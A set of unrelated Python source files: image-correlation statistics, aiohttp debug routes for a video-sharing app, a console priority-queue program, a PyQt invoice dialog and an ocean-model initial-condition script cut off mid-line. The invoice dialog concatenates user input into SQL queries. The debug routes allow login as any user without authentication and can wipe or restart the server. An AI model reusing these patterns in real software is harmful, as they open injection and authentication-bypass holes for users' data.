+{"seq_id":"233029979","text":"import os\r\nimport cv2\r\nimport numpy as np\r\nimport csv\r\n\r\n\r\ndef getMean(X):\r\n return np.round(np.mean(X), 2)\r\n\r\n\r\ndef getVar(X):\r\n return np.round(np.var(X), 2)\r\n\r\n\r\ndef getCovXY(X, Y):\r\n return np.round(np.cov(X, Y,)[0, 1], 2)\r\n # return np.round(np.cov(X, Y, bias=True)[0, 1], 2) 原本的\r\n\r\n\r\ndef getCorrelationXY(var_x, var_y, cov_x_y):\r\n correlation_x_y = cov_x_y/((var_x*var_y)**(1/2))\r\n return np.round(correlation_x_y, 6)\r\n # return np.round(np.corrcoef(X,Y)), 6) 原本的\r\n\r\n\r\ndef caculate(X, Y):\r\n x = getMean(X)\r\n y = getMean(Y)\r\n var_x = getVar(X)\r\n var_y = getVar(Y)\r\n cov_x_y = getCovXY(X, Y)\r\n correlation_x_y = getCorrelationXY(var_x, var_y, cov_x_y)\r\n # print(x, y, var_x, var_y, cov_x_y, correlation_x_y)\r\n return x, y, var_x, var_y, cov_x_y, correlation_x_y\r\n\r\n\r\ndef getHD(name, channel, arr):\r\n # test\r\n # print(arr.shape)\r\n # print(arr[0, 1])\r\n # print(arr[2, 1])\r\n X = arr[:, :arr.shape[1]-1].reshape(-1)\r\n # print(X)\r\n Y = arr[:, 1:].reshape(-1)\r\n # print(Y)\r\n\r\n x, y, var_x, var_y, cov_x_y, correlation_x_y = caculate(X, Y)\r\n return [name, 'HD', channel, x, y, var_x, var_y, cov_x_y, correlation_x_y]\r\n\r\n\r\ndef getVD(name, channel, arr):\r\n X = arr[:arr.shape[0]-1, :].reshape(-1)\r\n # print(X)\r\n Y = arr[1:, :].reshape(-1)\r\n # print(Y)\r\n x, y, var_x, var_y, cov_x_y, correlation_x_y = caculate(X, Y)\r\n return [name, 'VD', channel, x, y, var_x, var_y, cov_x_y, correlation_x_y]\r\n\r\n\r\ndef getDD(name, channel, arr):\r\n X = arr[:arr.shape[0]-1, :arr.shape[1]-1].reshape(-1)\r\n # print(X)\r\n Y = arr[1:, 1:].reshape(-1)\r\n # print(Y)\r\n x, y, var_x, var_y, cov_x_y, correlation_x_y = caculate(X, Y)\r\n return [name, 'DD', channel, x, y, var_x, var_y, cov_x_y, correlation_x_y]\r\n\r\n\r\ndef getOutput(name, img):\r\n csv_output = []\r\n # print(img.shape)\r\n\r\n # test\r\n # img = np.array([[88, 27, 196], [21, 61, 12], [183, 113, 125]])\r\n # csv_output.append(getHD(name, 'R', img))\r\n # csv_output.append(getVD(name, 'R', img))\r\n # csv_output.append(getDD(name, 'R', img))\r\n\r\n csv_output.append(getHD(name, 'R', img[:, :, 2]))\r\n csv_output.append(getHD(name, 'G', img[:, :, 1]))\r\n csv_output.append(getHD(name, 'B', img[:, :, 0]))\r\n\r\n csv_output.append(getVD(name, 'R', img[:, :, 2]))\r\n csv_output.append(getVD(name, 'G', img[:, :, 1]))\r\n csv_output.append(getVD(name, 'B', img[:, :, 0]))\r\n\r\n csv_output.append(getDD(name, 'R', img[:, :, 2]))\r\n csv_output.append(getDD(name, 'G', img[:, :, 1]))\r\n csv_output.append(getDD(name, 'B', img[:, :, 0]))\r\n # for i in csv_output:\r\n # print(i)\r\n return csv_output\r\n\r\n\r\ndef toCsvOutput(ori_dir, enc_dir, csv_name):\r\n csv_text = [['Image Name', 'Mode', 'Channel', 'x_bar', 'y_bar',\r\n 'VAR(X)', 'VAR(Y)', 'COV(X, Y)', 'Correlation(X,Y)']]\r\n for ori_name, enc_name in zip(os.listdir(ori_dir), os.listdir(enc_dir)):\r\n ori_img = cv2.imread(ori_dir+ori_name, cv2.IMREAD_COLOR)\r\n enc_img = cv2.imread(enc_dir+enc_name, cv2.IMREAD_COLOR)\r\n for i in getOutput(ori_name, ori_img):\r\n csv_text.append(i)\r\n\r\n for i in getOutput(enc_name, enc_img):\r\n csv_text.append(i)\r\n # break\r\n\r\n with open(csv_name, 'w', newline='') as csvfile:\r\n writer = csv.writer(csvfile)\r\n writer.writerows(csv_text)\r\n\r\n\r\ntoCsvOutput(\"13-Images/Origi_image/\", \"13-Images/Encry_image/\", 
\"output13.csv\")\r\n","sub_path":"hw13/4107056005-13-DEC_MAT3.py","file_name":"4107056005-13-DEC_MAT3.py","file_ext":"py","file_size_in_byte":3472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"583494350","text":"\nimport asyncio\nfrom aiohttp import web\nfrom aiohttp_session import get_session, new_session\nimport aiohttp_jinja2\nfrom aiohttp import ClientSession\n\nfrom bson.objectid import ObjectId\nimport json\nimport datetime\n\nfrom util import routes, get_user, to_objectid\nfrom backend import users, friends, comments, history, shares, playlists, videos\nfrom youtube import Youtube\n\nyoutube = Youtube()\n\n# TODO: disable debugging code\n\n@routes.get('/debug:populate')\nasync def debug_populate(request):\n import backend\n await backend.clear_all()\n # generate random users with personal data\n async with ClientSession() as session:\n async with session.get('https://randomuser.me/api/?results=100&nat=AU') as response:\n data = await response.json()\n for i, user in enumerate(data['results']):\n password = user['login']['password']\n email = user['email']\n name = user['name']['first'].title() + ' ' + user['name']['last'].title()\n #picture = '/static/img/person%d.jpg' % i \n picture = user['picture']['large']\n await users.add(password=password, email=email, name=name, picture=picture, origin='generated')\n # populate usage data for each user\n user_ids = [user['_id'] for user in await users.list()]\n print(user_ids)\n\n # get random data to sample from\n with open('debug-data/youtube_ids.txt') as fp:\n random_videos = [line.strip() for line in fp]\n with open('debug-data/laurem.txt') as fp:\n paragraphs = [line.strip() for line in fp]\n with open('debug-data/queries.txt') as fp:\n queries = [line.strip() for line in fp]\n with open('debug-data/folders.txt') as fp:\n folder_names = [line.strip().capitalize() for line in fp]\n\n import random\n video_ids = []\n async def populate_one_user(user_id):\n folders = []\n for i in range(random.randint(1, 5)):\n name = random.choice(folder_names)\n folders.append(await playlists.add_folder(user_id, name))\n # generate random friend connections\n friend_ids = []\n for num in range(random.randint(1, 8)):\n other_id = random.choice(user_ids)\n if other_id != user_id:\n request = True if random.random() > .5 else False\n await friends.add(user_id, other_id, request)\n if not request:\n friend_ids.append(other_id)\n print('FRIENDS:', friend_ids)\n # generate random queries\n for num in range(random.randint(1, 15)):\n #await history.add(user_id, 'query', random.choice(queries))\n pass\n\n # generate random video history\n for num in range(random.randint(1, 50)):\n video_id = random.choice(random_videos)\n video_ids.append(video_id)\n if random.random() > .5:\n folder_id = random.choice(folders)\n await playlists.add(user_id, folder_id, video_id)\n #await history.add(user_id, 'video', video_id)\n\n # generate random comments\n if random.random() > .3:\n words = random.choice(paragraphs).split()\n words = words[:random.randint(3, len(words) + 1)]\n if random.random() > .5:\n words = []\n comment_id = await comments.add(user_id, video_id, ' '.join(words))\n comment_item = await comments.get(comment_id)\n # share comment\n for other_id in friend_ids:\n if random.random() > .5:\n await shares.add(video_id, comment_id, {'thumbnail': 'https://i.ytimg.com/vi/%s/mqdefault.jpg' % video_id, 'text': comment_item['text']}, user_id, other_id)\n\n \n tasks = [populate_one_user(user_id) for user_id in user_ids]\n await asyncio.gather(*tasks)\n\n print(len(video_ids))\n async def populate_one_video_batch(start):\n async for item in youtube.video(video_ids[start: start + 25]):\n print(item['id'], item['snippet']['title'])\n await 
videos.add(video_id=item['id'], thumbnail=item['snippet']['thumbnails']['medium']['url'], title=item['snippet']['title'])\n tasks = [populate_one_video_batch(batch) for batch in range(0, len(video_ids), 25)]\n await asyncio.gather(*tasks)\n\n # also add a newbie user to test blank pages\n newbie = await users.add(password='newbie', email='newbie@newbie.com', name='newbie', picture='https://spikeybits.com/wp-content/uploads/2016/08/hello_my_name_is_newbie.png', origin='generated')\n\n raise web.HTTPFound('/login')\n\n@routes.get('/debug:users')\n@aiohttp_jinja2.template('user_list.html')\nasync def debug_users(request):\n result = []\n for user in await users.list():\n user['href'] = '/debug:login/' + str(user['_id'])\n result.append(user)\n return {'users': result}\n\n@routes.get('/debug:login/{user_id}')\n@aiohttp_jinja2.template('login.html')\nasync def debug_login(request):\n user_id = to_objectid(request.match_info['user_id'])\n user = await users.get(user_id)\n if user is not None:\n session = await new_session(request)\n session['user_id'] = str(user_id)\n await history.add(user_id, 'debug:login')\n raise web.HTTPFound('/')\n else:\n return {'error': 'invalid user_id'}\n\n@routes.get('/debug:clear')\nasync def debug_clear(request):\n session = await new_session(request)\n if 'user_id' in session:\n del session['user_id']\n import backend\n await backend.clear_all()\n raise web.HTTPFound('/')\n\n@routes.get('/debug:restart')\nasync def debug_restart(request):\n import os, sys\n os.execvp('python', ['python'] + sys.argv)\n\n@routes.get('/debug:videos')\n@aiohttp_jinja2.template('videos.html')\nasync def debug_videos(request):\n return {'videos': await videos.list()}\n\n@routes.get('/debug:history')\nasync def debug_history(request):\n result = []\n for user in await users.list():\n user_id = user['_id']\n items = await history.list(user_id)\n result.extend(items)\n def handler(obj):\n if isinstance(obj, (datetime.datetime, datetime.date)):\n return obj.isoformat()\n elif isinstance(obj, ObjectId):\n return str(obj) \n else:\n return obj\n return web.json_response(result, dumps=lambda obj: json.dumps(obj, default=handler))\n\n","sub_path":"src/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":6414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"594587741","text":"import random\nimport os\nimport re\n\nclass PriorityQueue(list):\n def __gt__(self, other):\n return len(self) > len(other)\n def __lt__(self, other):\n return len(self) < len(other)\n def __ge__(self, other):\n return len(self) >= len(other)\n def __le__(self, other):\n return len(self) <= len(other)\n def __eq__(self, other):\n return len(self) == len(other)\n\n def shiftdown(self, startpos, pos):\n newitem = self[pos] #Получение элемента данной позиции\n\n while pos > startpos: #пока данная позиция > статовой\n parentpos = (pos - 1) // 2 #Ищем индекс родителя\n parent = self[parentpos] #Ищем родителя\n if newitem < parent: #Если элемент на данной прозиции меньше родителя, то меняем их местами\n self[pos] = parent #то меняем их местами\n pos = parentpos #обновляем позицию\n continue\n break\n \n self[pos] = newitem #Возвращаем элемент на правильную позицию, если if сработал, если не сработал, то остается на месте\n\n def shiftup(self, pos):\n endpos = len(self) #Последняя позиция - длина массива\n startpos = pos #Стартовая позиция\n newitem = self[pos] #Получение элемента стартовой позиции\n \n leftpos = 2 * pos + 1 #Проверяем child для позиции\n while leftpos < endpos: #Пока позиция child < длины массива\n rightpos = leftpos + 1\n\n if rightpos < endpos and self[leftpos] > self[rightpos]: #если не конец, и левое больше правого\n leftpos = rightpos #то правый лист идет вверх\n \n self[pos] = self[leftpos] #Родитель = правому листу, если if выполнилось, и левому листу, если не выполнилось\n pos = leftpos #Позиция = правому листу, если if выполнилось, и левому листу, если не выполнилось\n leftpos = 2 * pos + 1 #Обновляем позицию и если не крайние листы цикл повторяется\n\n self[pos] = newitem #Возвращаем на правильную позицию место\n self.shiftdown(startpos, pos)\n\n def heapify(self): #Метод преобразования последовательности в кучу\n n = len(self)\n for i in reversed(range(n//2)):\n self.shiftup(i)\n \n def print(self):\n print(self)\n\n def check(self):\n return type(self)\n\n def pop_(self): #Извлечение элемента с наивысшем приоритетом\n lastelt = self.pop()\n if self:\n returnitem = self[0]\n self[0] = lastelt\n self.shiftup(0)\n return returnitem\n return lastelt\n\n def push(self, item): #Добавление элемента\n self.append(item)\n self.shiftdown(0, len(self)-1)\n\n def replace(self, item): #Замена элемента (добавлеятся данный item, удаляется элемент с наивысшем приоритетом)\n returnitem = self[0]\n self[0] = item\n self.shiftup(0)\n return returnitem\n\nclass ListComparator(list): #Сравнение по длине списка\n '''Компаратор для списков'''\n def __gt__(self, other):\n return len(self) > len(other)\n def __lt__(self, other):\n return len(self) < len(other)\n def __ge__(self, other):\n return len(self) >= len(other)\n def __le__(self, other):\n return len(self) <= len(other)\n def __eq__(self, other):\n return len(self) == len(other)\n\nclass StrComparator(str): #Сравнение по длине строки\n '''Компаратор для строк'''\n def __gt__(self, other):\n return len(self) > len(other)\n def __lt__(self, other):\n return len(self) < len(other)\n def __ge__(self, other):\n return len(self) >= len(other)\n def __le__(self, other):\n return len(self) <= len(other)\n def __eq__(self, other):\n return len(self) == len(other)\n\nclass DictComparator(dict): #Сравнение по длине значений словаря\n '''Компаратор для словарей'''\n def __gt__(self, other):\n for k, v in self.items():\n length_v = len(v)\n for k, v in other.items():\n length_o = len(v)\n return length_v > 
length_o\n def __lt__(self, other):\n for k, v in self.items():\n length_v = len(v)\n for k, v in other.items():\n length_o = len(v)\n return length_v < length_o\n def __ge__(self, other):\n for k, v in self.items():\n length_v = len(v)\n for k, v in other.items():\n length_o = len(v)\n return length_v >= length_o\n def __le__(self, other):\n for k, v in self.items():\n length_v = len(v)\n for k, v in other.items():\n length_o = len(v)\n return length_v <= length_o\n def __eq__(self, other):\n for k, v in self.items():\n length_v = len(v)\n for k, v in other.items():\n length_o = len(v)\n return length_v == length_o\n\n\nclass Table(PriorityQueue): #Таблица условное название (для удобства), это просто очередь с приоритетом\n '''Компаратор для таблиц'''\n def __gt__(self, other):\n return len(self) > len(other)\n def __lt__(self, other):\n return len(self) < len(other)\n def __ge__(self, other):\n return len(self) >= len(other)\n def __le__(self, other):\n return len(self) <= len(other)\n def __eq__(self, other):\n return len(self) == len(other)\n \n def __init__(self, table_name): #Конструктор\n self.name = table_name\n self.queue = self.user_interface()\n \n def user_interface(self): #Интрефейс для взаимодействия с пользователем\n print('МЕНЮ Таблицы\\n')\n print('1. Создать очередь с приоритетом заполненную псевдослучайными числами.')\n print('2. Создать пустую очередь.')\n print('3. Добавить новый элемент.')\n print('4. Добавить несколько элементов.')\n print('5. Удалить элемент с наивысшем приоритетом.')\n print('6. Заменить элемент (т.е внести новый элемент и удалить элемент с наивысшем приоритетом).')\n print('7. Вывести на экран очередь с приоритетом.')\n print('8. Выйти\\Сохранить.')\n print('\\n')\n \n queue = [] #Нужны для проверки на пустоту\n t = 'None'\n \n while True: #Бесконечный цикл для вызова функций класса\n number = enter_element_number('Введите номер пункта меню(ТАБЛИЦЫ): ',\n 'Вы ввели не верный номер. Попробуйте еще раз')\n\n if number == 1:\n queue, t = self.create_queue() #Создание таблицы заполненное рандомными числами\n elif number == 2:\n queue, t = self.create_empty_queue() #Создать пустую таблицу с выбором типа данных\n elif number == 3:\n self.wrapper(queue, self.push_element, t) #Добавить 1 элемент\n elif number == 4:\n self.wrapper(queue, self.push_elements, t) #Добавить несколько элементов\n elif number == 5:\n self.wrapper(queue, self.pop_element, t) #Удалить элемент с наивысшим приоритетом\n elif number == 6:\n self.wrapper(queue, self.replace_element, t) #Заменить элемент с наивысшим приоритетом\n elif number == 7:\n self.wrapper(queue, self.print_queue, t) # Вывести таблицу(очередь)\n elif number == 8: #Сохранение\n print('До свидания!')\n return queue\n break\n else:\n print('Введенного номера нет в МЕНЮ. Попробуйте еще раз.')\n\n def enter_element_list(self): #Парсер ввода для элементов списка\n mass = input('Введите список объектов через запятую.' 
+\n '\\nЕсли хотите записать строку (пример:\"ваша_строка\")'+\n '\\nЕсли хотите записать число кавычки не нужны.'+\n '\\nЦелые числа пишутся через точку (пример: \"a\",\"bc\",5.0): ').split(',')\n \n element = []\n for i in mass: \n if re.findall(r'[0-9]+\\.[0-9]+', i) or re.findall(r'\"[0-9]+\\.[0-9]+\"', i): #Числа через точку\n try:\n element.append(float(i))\n except Exception:\n element.append(re.findall(r'\"[0-9]+\\.[0-9]+\"', i)[0][1:-1]) #Стркоа с числом\n elif re.findall(r'\"\\D+\"', i): #Поиск\n try:\n element.append(re.findall(r'\"\\D+\"', i)[0][1:-1]) #Поиск любых символов кроме цифры\n except Exception:\n continue\n elif re.findall(r'\"\\w+\"', i):\n try:\n element.append(re.findall(r'\"\\w+\"', i)[0][1:-1]) #Поиск любой буквы или части слова\n except Exception:\n continue\n else:\n try:\n element.append(i[1:-1]) #Если ничего не найдет, то это просто слово\n except Exception:\n continue\n return element\n\n def enter_element_dict(self): #Ввод элементов словаря\n size = enter_element_number('\\nВведите размер словаря, который хотите внести (целое положительно число): ') \n while True:\n try:\n element = dict([input('Введите ключ и значение через пробел: ').split() for _ in range(int(size))])\n return element\n except Exception:\n print('Не верное значение! Попробуйте сначала')\n\n def wrapper(self, queue, target, t): #Оболочка для вызова функций \n if target.__code__.co_argcount == 3: #Если 3 аргумента функции\n target(queue, t)\n else:\n target(queue) #Если не 3 аргумента у функции\n\n def check_type_wrapper(self, queue, t, target): #Проверка на тип данных, в зависимости от этого различный тип ввода\n if t == 'int' or t == 'float':\n element = enter_element_number('Введите число: ')\n if target == 'push':\n queue.push(element)\n print('Элемент успешно добавлен!')\n elif target == 'replace':\n queue.replace(element)\n print('Элемент успешно заменен!')\n elif t == 'string':\n element = input('Введите строку: ')\n if target == 'push':\n queue.push(StrComparator(element))\n print('Элемент успешно добавлен!')\n elif target == 'replace':\n queue.replace(StrComparator(element))\n print('Элемент успешно добавлен!')\n elif t == 'list':\n element = self.enter_element_list()\n if target == 'push':\n queue.push(ListComparator(element))\n print('Элемент успешно добавлен!')\n elif target == 'replace':\n queue.replace(ListComparator(element))\n print('Элемент успешно добавлен!')\n elif t == 'dict':\n element = self.enter_element_dict()\n if target == 'push':\n queue.push(DictComparator(element))\n print('Элемент успешно добавлен!')\n elif target == 'replace':\n queue.replace(DictComparator(element))\n print('Элемент успешно добавлен!')\n \n def create_queue(self): #Создание очереди с рандомными числами\n size = enter_element_number('\\nВведите размер очереди (целое положительно число): ')\n values = get_random_values(size)\n \n queue = PriorityQueue(values)\n queue.heapify()\n print('Очередь с приоритетом имеет вид: ')\n queue.print()\n \n return queue, 'int'\n\n def create_empty_queue(self): #создание очереди с указанием типа\n while True:\n t = input('Введите какой тип данных хотите хранить' +\n '\\n(string:строка, int:целое число, float:число с плавающей точкой, list:список объектов, dict:словарь): ')\n\n if t == 'float' or t == 'int' or t == 'list' or t == 'string' or t == 'dict':\n break\n else:\n print('Вы ввели не правильный тип данных, попробуйте еще раз...')\n \n queue = PriorityQueue([])\n queue.heapify()\n print('Очередь с приоритетом имеет вид: ')\n queue.print()\n print('Тип 
элементов: ' + t)\n \n return queue, t\n \n def push_element(self, queue, t): #Добавление\n self.check_type_wrapper(queue, t, 'push')\n \n def replace_element(self, queue, t): #Замена\n self.check_type_wrapper(queue, t, 'replace')\n\n def push_elements(self, queue, t): #Добавление нескольких элементов\n size = enter_element_number('Сколько добавляем элементов?: ')\n [self.push_element(queue, t) for _ in range(int(size))]\n\n def pop_element(self, queue): #Удаление элементов с наивысшим приоритетом, если очередь не пуста\n if len(queue) > 0:\n element = queue.pop_()\n print(f'\\nЭлемент \"{element}\" успешно удален')\n else:\n print('\\nПустая очередь!')\n\n def print_queue(self, queue): #Вывод очереди\n queue.print()\n\n\nclass Database(PriorityQueue):\n '''Класс для хранения таблиц, тип: очередь с приоритетом'''\n \n def user_interface(self): #Интерфейс для вызова методов\n print('МЕНЮ Базы данных\\n')\n print('1. Создать новую таблицу.')\n print('2. Вывести все таблицы базы данных.')\n print('3. Удалить таблицу с наивысшим приоритетом.')\n print('4. Заменить таблицу (заменяет таблицу с наивысшим приоритетом).')\n print('5. Выйти\\Сохранить.')\n print('\\n')\n \n \n while True:\n number = enter_element_number('Введите номер пункта меню(БАЗА ДАННЫХ): ',\n 'Вы ввели не верный номер. Попробуйте еще раз')\n\n if number == 1:\n self.create_table() #Создание очереди с приоритетом\n break\n elif number == 2:\n self.print_table() #Вывод базы данных\n elif number == 3:\n self.pop_table() #Удаление таблицы\n elif number == 4:\n self.replace_table() #Замена таблицы\n break\n elif number == 5: #Сохранение\n print('До свидания!')\n break\n else:\n print('Введенного номера нет в МЕНЮ. Попробуйте еще раз.')\n\n def create_table(self):\n os.system(\"cls\")\n print('Создание новой таблицы...')\n name_table = input('Введите имя новой таблицы: ')\n table = Table(name_table)\n self.push(DictComparator({name_table: table.queue}))\n os.system(\"cls\")\n self.user_interface()\n\n def print_table(self):\n print(self)\n\n def pop_table(self):\n if len(self) > 0:\n element = self.pop_()\n print(f'\\nЭлемент \"{element}\" успешно удален')\n else:\n print('\\nПустая база данных!')\n \n def replace_table(self):\n self.pop_table()\n self.create_table()\n\n\ndef get_random_values(size, minimum = 1, maximum = 100): #Получение случайных чисел 0..100\n return [random.uniform(minimum, maximum) for _ in range(int(size)) if int(size) > 0]\n\ndef create_database(): #Осноаня функция Создания базы данных\n while True:\n print('Создание новой базы данных...')\n name_database = input('\\nВведите название базы данных без пробелов: ')\n\n if len(name_database.split(' ')) == 1 and name_database != '':\n break\n else:\n print('Вы ввели недопустимое имя, попробуйте еще раз...')\n \n database = Database(PriorityQueue([])) #Создание пустой базы данных на основе Очереди с приоритетом \n print('База данных ' + name_database + ' успешно создана!')\n return database\n\ndef enter_element_number(text_input,\n text_except='Вы ввели не число. Попробуйте еще раз...'): #Функция для ввода чисел\n while True:\n try:\n element = float(input(text_input))\n return element\n except ValueError:\n print(text_except)\n \n\nif __name__ == '__main__':\n database = create_database()\n database.user_interface()\n \n '''\n list_database = []\n \n print('Cписок БАЗ ДАННЫХ\\n')\n print('1. Показать весь список баз данных.')\n print('2. Добавить новую базу данных.')\n print('3. Удалить базу данных.')\n print('4. 
Выйти.')\n print('\\n')\n \n while True:\n number = enter_element_number('Введите номер пункта меню: ',\n 'Вы ввели не верный номер. Попробуйте еще раз')\n if number == 1:\n print(list_database)\n elif number == 2:\n os.system(\"cls\")\n database, name_database = create_database()\n database.user_interface()\n list_database.append(DictComparator({name_database: database}))\n os.system(\"cls\")\n elif number == 3:\n key = input('Введите имя базы данных для удаления: ')\n for i in range(len(list_database)):\n for k, v in list_database[i].items():\n if k == key:\n db = list_database.pop(i)\n print(key + ' успешно удалена!')\n break\n \n elif number == 4: #Сохранение\n print('До свидания!')\n break\n else:\n print('Введенного номера нет в МЕНЮ. Попробуйте еще раз.')\n\n '''\n","sub_path":"task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":21372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"237710363","text":"import sys\nfrom modulo.Connector import *\nfrom modulo.interfaz.DetalleCompra import *\n\nclass DetalleCompra(QtGui.QDialog):\n def __init__(self, parent=None):\n QtGui.QWidget.__init__(self, parent)\n self.dfc = Ui_DetallesCompra()\n self.dfc.setupUi(self)\n self.IniciarTabla()\n self.dfc.lineBuscar.setPlaceholderText(\"Ingresa lo que deseas buscar\")\n QtCore.QObject.connect(self.dfc.pushBuscar, QtCore.SIGNAL('clicked()'), self.FiltrarTabla)\n def IniciarTabla(self):\n model = QtGui.QStandardItemModel()\n model.setColumnCount(3)\n headerNames = [\"Producto\",\"Cantidad\",\"Precio\"]\n model.setHorizontalHeaderLabels(headerNames)\n self.dfc.tableView.horizontalHeader().setStretchLastSection(True)\n self.dfc.tableView.verticalHeader().setDefaultSectionSize(40)\n self.dfc.tableView.resizeRowsToContents()\n self.dfc.tableView.setModel(model)\n def FiltrarTabla(self):\n buscar = self.dfc.lineBuscar.text()\n consultor = Connector()\n consulta = \"SELECT proveedor,fecha,total FROM Factura_C WHERE ID=\"+buscar\n qvf = consultor.cur.execute(consulta)\n datosft = consultor.cur.fetchall()\n if(qvf==0):\n QtGui.QMessageBox.question(self, 'Factura no encontrada!', \"No se encontro la factura\")\n else:\n for d in datosft:\n cont=0\n row = []\n for name in d:\n cont=cont+1\n name = str(name)\n if cont==1:\n self.dfc.lineProveedor.setText(name)\n if cont==2:\n self.dfc.lineFecha.setText(name)\n if cont==3:\n self.dfc.lineTotal.setText(name)\n consulta = \"SELECT IDPROD,cantidad,precio FROM Detalle_FC WHERE IDF=\"+buscar\n consultor.cur.execute(consulta)\n datosft = consultor.cur.fetchall()\n model = QtGui.QStandardItemModel()\n model.setColumnCount(3)\n headerNames = [\"Producto\",\"Cantidad\",\"Precio\"]\n model.setHorizontalHeaderLabels(headerNames)\n for d in datosft:\n row = []\n for name in d:\n name = str(name)\n item = QtGui.QStandardItem(name)\n item.setEditable(False)\n row.append(item)\n model.appendRow(row)\n self.dfc.tableView.horizontalHeader().setStretchLastSection(True)\n self.dfc.tableView.verticalHeader().setDefaultSectionSize(40)\n self.dfc.tableView.resizeRowsToContents()\n self.dfc.tableView.setModel(model)\n","sub_path":"modulo/DetalleCompra.py","file_name":"DetalleCompra.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"37231866","text":"#!/usr/bin/env python\n'''\nThis script creates an initial condition file for MPAS-Ocean.\n'''\nimport os\nimport shutil\nimport numpy as np\nimport netCDF4 as nc\nfrom netCDF4 import Dataset\n\nLy = 3000.0e3\nLz = 4800.0\n\ndef main():\n # {{{\n\n shutil.copy2('base_mesh.nc', 'initial_state.nc')\n ds = Dataset('initial_state.nc', 'a', format='NETCDF3_64BIT_OFFSET')\n\n vertical_init(ds)\n tracer_init(ds)\n velocity_init(ds)\n coriolis_init(ds)\n others_init(ds)\n\n ds.close()\n# }}}\n\ndef vertical_init(ds):\n thicknessAllLayers = 100.0 # [m] for evenly spaced layers\n nVertLevels = int(Lz / thicknessAllLayers)\n minLayers = 3\n# {{{\n # create new variables # {{{\n ds.createDimension('nVertLevels', nVertLevels)\n refLayerThickness = ds.createVariable(\n 'refLayerThickness', np.float64, ('nVertLevels',))\n maxLevelCell = ds.createVariable('maxLevelCell', np.int32, ('nCells',))\n refBottomDepth = ds.createVariable(\n 'refBottomDepth', np.float64, ('nVertLevels',))\n refZMid = ds.createVariable('refZMid', np.float64, ('nVertLevels',))\n bottomDepth = ds.createVariable('bottomDepth', np.float64, ('nCells',))\n bottomDepthObserved = ds.createVariable(\n 'bottomDepthObserved', np.float64, ('nCells',))\n layerThickness = ds.createVariable(\n 'layerThickness', np.float64, ('Time', 'nCells', 'nVertLevels',))\n restingThickness = ds.createVariable(\n 'restingThickness', np.float64, ('nCells', 'nVertLevels',))\n vertCoordMovementWeights = ds.createVariable(\n 'vertCoordMovementWeights', np.float64, ('nVertLevels',))\n # }}}\n\n # obtain dimensions and mesh variables # {{{\n nCells = len(ds.dimensions['nCells'])\n xCell = ds.variables['xCell']\n yCell = ds.variables['yCell']\n # }}}\n\n # evenly spaced vertical grid\n refLayerThickness[:] = thicknessAllLayers\n\n # Create other variables from refLayerThickness\n refBottomDepth[0] = refLayerThickness[0]\n refZMid[0] = -0.5 * refLayerThickness[0]\n for k in range(1, nVertLevels):\n refBottomDepth[k] = refBottomDepth[k - 1] + refLayerThickness[k]\n refZMid[k] = -refBottomDepth[k - 1] - 0.5 * refLayerThickness[k]\n vertCoordMovementWeights[:] = 1.0\n\n # flat bottom, no bathymetry\n #maxLevelCell[:] = nVertLevels\n #bottomDepth[:] = refBottomDepth[nVertLevels-1]\n #bottomDepthObserved[:] = refBottomDepth[nVertLevels-1]\n # for k in range(nVertLevels):\n # layerThickness[0,:,k] = refLayerThickness[k]\n # restingThickness[:,k] = refLayerThickness[k]\n\n # Define bottom depth: parabola\n for iCell in range(0, nCells):\n x = xCell[iCell]\n y = yCell[iCell]\n bottomDepthObserved[iCell] \\\n = 1.1 * Lz * (1.0 - ((y - Ly / 2) / (Ly / 2))**2) - 100\n\n # full cells, not partial\n # initialize to very bottom:\n maxLevelCell[:] = nVertLevels\n bottomDepth[:] = refBottomDepth[nVertLevels - 1]\n for k in range(nVertLevels):\n layerThickness[0, :, k] = refLayerThickness[k]\n restingThickness[:, k] = refLayerThickness[k]\n for iCell in range(0, nCells):\n x = xCell[iCell]\n y = yCell[iCell]\n for k in range(nVertLevels):\n if bottomDepthObserved[iCell] < refBottomDepth[k]:\n maxLevelCell[iCell] = max(k, minLayers)\n bottomDepth[iCell] = refBottomDepth[maxLevelCell[iCell] - 1]\n break\n# }}}\n\ndef tracer_init(ds):\n slope = 0.001\n # temperature: linear, match slope\n Tmin = 5.0\n Tx = 0.0\n Ty = 15.0 / Ly\n Tz = Ty / slope\n\n # salinity: linear, match slope\n Smin = 15.0\n Sx = 0.0\n Sy = 15.0 / Ly\n Sz = Sy / slope\n\n # tracer1: Gaussian\n y0 = Ly / 2\n yr = Ly / 4\n z0 = -Lz / 3\n zr = Lz / 4\n# {{{\n\n # create new variables # 
{{{\n tracer1 = ds.createVariable(\n 'tracer1', np.float64, ('Time', 'nCells', 'nVertLevels',))\n tracer2 = ds.createVariable(\n 'tracer2', np.float64, ('Time', 'nCells', 'nVertLevels',))\n tracer3 = ds.createVariable(\n 'tracer3', np.float64, ('Time', 'nCells', 'nVertLevels',))\n temperature = ds.createVariable(\n 'temperature', np.float64, ('Time', 'nCells', 'nVertLevels',))\n salinity = ds.createVariable(\n 'salinity', np.float64, ('Time', 'nCells', 'nVertLevels',))\n layerThickness = ds.variables['layerThickness']\n # }}}\n\n # obtain dimensions and mesh variables # {{{\n nVertLevels = len(ds.dimensions['nVertLevels'])\n nCells = len(ds.dimensions['nCells'])\n xCell = ds.variables['xCell']\n yCell = ds.variables['yCell']\n refZMid = ds.variables['refZMid']\n refBottomDepth = ds.variables['refBottomDepth']\n # }}}\n for iCell in range(0, nCells):\n x = xCell[iCell]\n y = yCell[iCell]\n for k in range(0, nVertLevels):\n z = refZMid[k]\n\n temperature[0, iCell, k] \\\n = Tx * x + Ty * y + Tz * z\n salinity[0, iCell, k] \\\n = Sx * x + Sy * y + Sz * z\n tracer1[0, iCell, k] \\\n = 1.0 + np.exp(\n -((y - y0) / yr)**2\n - ((z - z0) / zr)**2)\n tracer2[0, iCell, k] = 1.0\n tracer3[0, iCell, k] = 1.0\n\n tracer2[0, iCell, 10:20] = int(2 + np.cos(y * 4 * 2 * np.pi / Ly))\n\n if ((y > Ly / 4) & (y < Ly / 2)) | (y > 3 * Ly / 4):\n tracer3[0, iCell, 0:20] = 